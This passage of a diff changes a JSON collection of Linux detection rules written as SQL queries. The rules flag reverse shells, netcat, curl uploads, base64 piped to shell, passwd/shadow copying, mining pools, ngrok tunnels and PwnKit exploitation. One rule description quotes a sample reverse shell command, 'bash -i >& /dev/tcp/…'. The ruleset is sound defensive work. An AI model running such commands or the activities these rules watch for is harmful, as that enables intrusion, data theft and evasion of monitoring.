- "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Bash Interactive Shell", + "id": "6104e693-a7d6-4891-86cb-49a258523559", + "description": "Detects execution of the bash shell with the interactive flag \"-i\".", + "author": "@d4ns4n_", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.execution" ], "falsepositives": [ - "Legitimate activities" + "Unknown" ], - "level": "informational", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/file' ESCAPE '\\' AND CommandLine REGEXP '(.){200,}') OR (Image LIKE '%/ls' ESCAPE '\\' AND CommandLine LIKE '%-R%' ESCAPE '\\') OR Image LIKE '%/find' ESCAPE '\\' OR Image LIKE '%/tree' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/bash' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_file_and_directory_discovery.yml" + "filename": "proc_creation_lnx_bash_interactive_shell.yml" }, { - "title": "Interactive Bash Suspicious Children", - "id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", - "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", - "author": "Florian Roth (Nextron Systems)", + "title": "Install Root Certificate", + "id": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "author": "Ömer Günal, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], "falsepositives": [ - "Legitimate software that uses these patterns" + "Legitimate administration activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (ParentCommandLine = 'bash -i' AND ((CommandLine LIKE '%-c import %' ESCAPE '\\' OR CommandLine LIKE '%base64%' ESCAPE '\\' OR CommandLine LIKE '%pty.spawn%' ESCAPE '\\') OR (Image LIKE '%whoami' ESCAPE '\\' OR Image LIKE '%iptables' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE 
'\\' OR Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/netcat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/update-ca-certificates' ESCAPE '\\' OR Image LIKE '%/update-ca-trust' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_susp_interactive_bash.yml" + "filename": "proc_creation_lnx_install_root_certificate.yml" }, { - "title": "Apache Spark Shell Command Injection - ProcessCreation", - "id": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Local Groups Discovery - Linux", + "id": "676381a6-15ca-4d73-a9c8-6a22e970b90d", + "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (ParentImage LIKE '%\\\\bash' ESCAPE '\\' AND (CommandLine LIKE '%id -Gn `%' ESCAPE '\\' OR CommandLine LIKE '%id -Gn ''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/groups' ESCAPE '\\' OR ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '%/etc/group%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + "filename": "proc_creation_lnx_local_groups.yml" }, { "title": "Local System Accounts Discovery - Linux", 
@@ -2061,411 +2115,420 @@ "filename": "proc_creation_lnx_local_account.yml" }, { - "title": "Process Discovery", - "id": "4e2f5868-08d4-413d-899f-dc2f1508627b", - "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", - "author": "Ömer Günal, oscd.community", + "title": "System Network Discovery - Linux", + "id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "description": "Detects enumeration of local network configuration", + "author": "Ömer Günal and remotephone, oscd.community", "tags": [ "attack.discovery", - "attack.t1057" + "attack.t1016" ], "falsepositives": [ "Legitimate administration activities" ], "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/ps' ESCAPE '\\' OR Image LIKE '%/top' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/firewall-cmd' ESCAPE '\\' OR Image LIKE '%/ufw' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/ss' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/systemd-resolve' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\') OR CommandLine LIKE '%/etc/resolv.conf%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_process_discovery.yml" + "filename": "proc_creation_lnx_system_network_discovery.yml" }, { - "title": "History File Deletion", - "id": "1182f3b3-e716-4efa-99ab-d2685d04360f", - "description": "Detects events in which a history file gets deleted, e.g. 
the ~/bash_history to remove traces of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Triple Cross eBPF Rootkit Install Commands", + "id": "22236d75-d5a0-4287-bf06-c93b1770860f", + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565.001" + "attack.defense_evasion", + "attack.t1014" ], "falsepositives": [ - "Legitimate administration activities" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/sudo' ESCAPE '\\' AND CommandLine LIKE '% tc %' ESCAPE '\\' AND CommandLine LIKE '% enp0s3 %' ESCAPE '\\' AND (CommandLine LIKE '% qdisc %' ESCAPE '\\' OR CommandLine LIKE '% filter %' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_history_delete.yml" + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml" }, { - "title": "Linux Package Uninstall", - "id": "95d61234-7f56-465c-6f2d-b562c6fedbc4", - "description": "Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".", - "author": "Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)", + "title": "OMIGOD SCX RunAsProvider ExecuteScript", + "id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following 
directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" ], "falsepositives": [ - "Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting)." + "Legitimate use of SCX RunAsProvider ExecuteScript." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%erase%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\')) OR ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND (CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%purge%' ESCAPE '\\')) OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--remove %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/etc/opt/microsoft/scx/conf/tmpdir/scx%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_remove_package.yml" + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" }, { - "title": "Linux Crypto Mining Indicators", - "id": "9069ea3c-b213-4c52-be13-86506a227ab1", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Group Has Been Deleted Via Groupdel", + "id": 
"8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", + "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", + "author": "Tuan Le (NCSGroup)", + "tags": [ + "attack.impact", + "attack.t1531" + ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate administrator activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%sh -c /sbin/modprobe msr allow\\_writes=on%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE Image LIKE '%/groupdel' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_crypto_mining.yml" + "filename": "proc_creation_lnx_groupdel.yml" }, { - "title": "Suspicious Curl File Upload - Linux", - "id": "00b90cc1-17ec-402c-96ad-3a8117d7a582", - "description": "Detects a suspicious curl process start the adds a file to a web request", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Copy Passwd Or Shadow From TMP Path", + "id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba", + "description": "Detects when the file \"passwd\" or \"shadow\" is copied 
from tmp path", + "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/cp' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\' AND (CommandLine LIKE '%passwd%' ESCAPE '\\' OR CommandLine LIKE '%shadow%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_curl_fileupload.yml" + "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" }, { - "title": "Nohup Execution", - "id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", - "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "Linux HackTool Execution", + "id": "a015e032-146d-4717-8944-7a1884122111", + "description": "Detects known hacktool execution based on image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Administrators or installed processes that leverage nohup" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/nohup' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/sqlmap' ESCAPE '\\' OR Image LIKE '%/teamserver' ESCAPE '\\' OR Image LIKE '%/aircrack-ng' ESCAPE '\\' OR Image LIKE '%/john' ESCAPE '\\' OR Image LIKE '%/setoolkit' ESCAPE 
'\\' OR Image LIKE '%/wpscan' ESCAPE '\\' OR Image LIKE '%/hydra' ESCAPE '\\' OR Image LIKE '%/nikto' ESCAPE '\\' OR Image LIKE '%/ebpfkit' ESCAPE '\\' OR Image LIKE '%/bpfdos' ESCAPE '\\' OR Image LIKE '%/exechijack' ESCAPE '\\' OR Image LIKE '%/pidhide' ESCAPE '\\' OR Image LIKE '%/writeblocker' ESCAPE '\\') OR Image LIKE '%/linpeas%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_nohup.yml" + "filename": "proc_creation_lnx_hack_tools.yml" }, { - "title": "Linux Recon Indicators", - "id": "0cf7a157-8879-41a2-8f55-388dd23746b7", - "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", - "author": "Florian Roth (Nextron Systems)", + "title": "User Has Been Deleted Via Userdel", + "id": "08f26069-6f80-474b-8d1f-d971c6fedea0", + "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", + "author": "Tuan Le (NCSGroup)", "tags": [ - "attack.reconnaissance", - "attack.t1592.004", - "attack.credential_access", - "attack.t1552.001" + "attack.impact", + "attack.t1531" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate administrator activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '% -name .htpasswd%' ESCAPE '\\' OR CommandLine LIKE '% -perm -4000 %' ESCAPE '\\')" + "SELECT * FROM logs WHERE Image LIKE '%/userdel' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_susp_recon_indicators.yml" + "filename": "proc_creation_lnx_userdel.yml" }, { - "title": "System Network Discovery - Linux", - "id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", - "description": "Detects enumeration of local network configuration", - "author": "Ömer Günal and remotephone, oscd.community", + "title": "Linux Base64 Encoded Pipe to Shell", + "id": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "description": "Detects suspicious process 
command line that uses base64 encoded input for execution with a shell", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016" + "attack.defense_evasion", + "attack.t1140" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/firewall-cmd' ESCAPE '\\' OR Image LIKE '%/ufw' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/ss' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/systemd-resolve' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\') OR CommandLine LIKE '%/etc/resolv.conf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (CommandLine LIKE '%base64 -w0 %' ESCAPE '\\' AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_system_network_discovery.yml" + "filename": "proc_creation_lnx_base64_execution.yml" }, { - "title": "Security Software Discovery - Linux", - "id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", - "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", - "author": "Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], + "title": "Linux Crypto Mining Pool Connections", + "id": "a46c93b7-55ed-4d27-a41b-c259456c4746", + "description": "Detects process connections to a Monero crypto mining pool", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate activities" + "Legitimate use of crypto miners" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((Image LIKE '%/grep' ESCAPE '\\' OR Image LIKE '%/egrep' ESCAPE '\\') AND (CommandLine LIKE '%nessusd%' ESCAPE '\\' OR CommandLine LIKE '%td-agent%' ESCAPE '\\' OR CommandLine LIKE '%packetbeat%' ESCAPE '\\' OR CommandLine LIKE '%filebeat%' ESCAPE '\\' OR CommandLine LIKE '%auditbeat%' ESCAPE '\\' OR CommandLine LIKE '%osqueryd%' ESCAPE '\\' OR CommandLine LIKE '%cbagentd%' ESCAPE '\\' OR CommandLine LIKE '%falcond%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" ], - "filename": "proc_creation_lnx_security_software_discovery.yml" + "filename": "net_connection_lnx_crypto_mining_indicators.yml" }, { - "title": "User Added To Root/Sudoers Group Using Usermod", - "id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", - "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", - "author": "TuanLe (GTSC)", + "title": "Communication To Ngrok Tunneling Service - Linux", + "id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Legitimate administrator activities" + 
"Legitimate use of ngrok" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/usermod' ESCAPE '\\' AND (CommandLine LIKE '%-aG root%' ESCAPE '\\' OR CommandLine LIKE '%-aG sudoers%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_usermod_susp_group.yml" + "filename": "net_connection_lnx_ngrok_tunnel.yml" }, { - "title": "Print History File Contents", - "id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", - "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "title": "Linux Reverse Shell Indicator", + "id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", + "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" + "SELECT * FROM logs 
WHERE (Image LIKE '%/bin/bash' ESCAPE '\\' AND NOT (DestinationIp IN ('127.0.0.1', '0.0.0.0')))" ], - "filename": "proc_creation_lnx_susp_history_recon.yml" + "filename": "net_connection_lnx_back_connect_shell_dev.yml" }, { - "title": "Suspicious Curl Change User Agents - Linux", - "id": "b86d356d-6093-443d-971c-9b07db583c68", - "description": "Detects a suspicious curl process start on linux with set useragent options", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabling Security Tools - Builtin", + "id": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "description": "Detects disabling security tools", + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (logs MATCH ('\"stopping iptables\" OR \"stopping ip6tables\" OR \"stopping firewalld\" OR \"stopping cbdaemon\" OR \"stopping falcon-sensor\"'))" ], - "filename": "proc_creation_lnx_susp_curl_useragent.yml" + "filename": "lnx_syslog_security_tools_disabling_syslog.yml" }, { - "title": "Ufw Force Stop Using Ufw-Init", - "id": "84c9e83c-599a-458a-a0cb-0ecce44e807a", - "description": "Detects attempts to force stop the ufw using ufw-init", - "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", + "title": "Suspicious Named Error", + "id": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", + "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + 
"attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Network administrators" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((CommandLine LIKE '%-ufw-init%' ESCAPE '\\' AND CommandLine LIKE '%force-stop%' ESCAPE '\\') OR (CommandLine LIKE '%ufw%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (logs MATCH ('\" dropping source port zero packet from \" OR \" denied AXFR from \" OR \" exiting (due to fatal error)\"'))" ], - "filename": "proc_creation_lnx_disable_ufw.yml" + "filename": "lnx_syslog_susp_named.yml" }, { - "title": "Capabilities Discovery - Linux", - "id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", - "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "JexBoss Command Sequence", + "id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "description": "Detects suspicious command sequence that JexBoss", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.execution", + "attack.t1059.004" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/getcap' ESCAPE '\\' AND (CommandLine LIKE '% /r %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (logs MATCH ('\"bash -c /bin/bash\" AND \"&/dev/tcp/\"'))" ], - "filename": "proc_creation_lnx_capa_discovery.yml" + "filename": "lnx_susp_jexboss.yml" }, { - "title": "Potential Discovery Activity Using Find - Linux", - "id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", - "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Nimbuspwn Exploitation", + "id": 
"7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/find' ESCAPE '\\' AND (CommandLine LIKE '%-perm -4000%' ESCAPE '\\' OR CommandLine LIKE '%-perm -2000%' ESCAPE '\\' OR CommandLine LIKE '%-perm 0777%' ESCAPE '\\' OR CommandLine LIKE '%-perm -222%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o w%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o x%' ESCAPE '\\' OR CommandLine LIKE '%-perm -u=s%' ESCAPE '\\' OR CommandLine LIKE '%-perm -g=s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ( = 'networkd-dispatcher' AND = 'Error handling notification for interface' AND = '../../')" ], - "filename": "proc_creation_lnx_susp_find_execution.yml" + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml" }, { - "title": "Linux Shell Pipe to Shell", - "id": "880973f3-9708-491c-a77b-2a35a1921158", - "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", - "author": "Florian Roth (Nextron Systems)", + "title": "Modifying Crontab", + "id": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "description": "Detects suspicious modification of crontab file.", + "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.persistence", + "attack.t1053.003" ], "falsepositives": [ - "Legitimate software that uses these patterns" + "Legitimate modification of crontab" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((CommandLine LIKE 'sh -c %' ESCAPE '\\' OR CommandLine LIKE 'bash -c %' ESCAPE '\\') AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE 
'%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" + "SELECT * FROM logs WHERE logs MATCH ('\"REPLACE\"')" ], - "filename": "proc_creation_lnx_susp_pipe_shell.yml" + "filename": "lnx_cron_crontab_file_modification.yml" }, { - "title": "Disabling Security Tools", - "id": "e3a8a052-111f-4606-9aee-f28ebeb76776", - "description": "Detects disabling security tools", - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "title": "PwnKit Local Privilege Escalation", + "id": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.001" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/service' ESCAPE '\\' AND CommandLine LIKE '%ip6tables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine LIKE '%iptables%' ESCAPE '\\' AND CommandLine LIKE '%stop%' ESCAPE '\\') OR (Image LIKE '%/chkconfig' ESCAPE '\\' AND CommandLine 